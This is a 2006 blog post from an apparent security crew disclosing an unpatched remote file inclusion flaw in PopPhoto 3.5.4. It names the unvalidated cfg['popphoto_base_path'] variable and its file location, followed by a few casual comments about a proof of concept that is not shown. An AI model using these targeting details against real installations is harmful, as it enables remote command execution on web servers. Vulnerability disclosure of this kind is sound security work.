by r0t,der4444,cembo,VietMafia

Sunday, May 14, 2006

PopPhoto - Remote File Inclusion Vuln

PopPhoto - Remote File Inclusion Vuln

script: PopPhoto 3.5.4 and below
risk: critical
status: unpatched
discovered by: VietMafia

Vuln. Description:

This flaw is due to an input validation error in the "resources/includes/"(line 25) that does not validate the "cfg['popphoto_base_path']" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server



sorry all, i 'm still on travelling so i dont have much time to contribute :) i will be back very soon.


Blogger r0t told...

No probz bro,im also still enjoyin my holyidays...

4:32 AM

Anonymous alfanso told...

poc isnt working..........:O

8:56 AM

Blogger VietMafia told...

lol, you have to use the PoC wisely mate

4:02 PM


Post a Comment

<< Home

Copyright (c) 2006 Pridels Sec Crew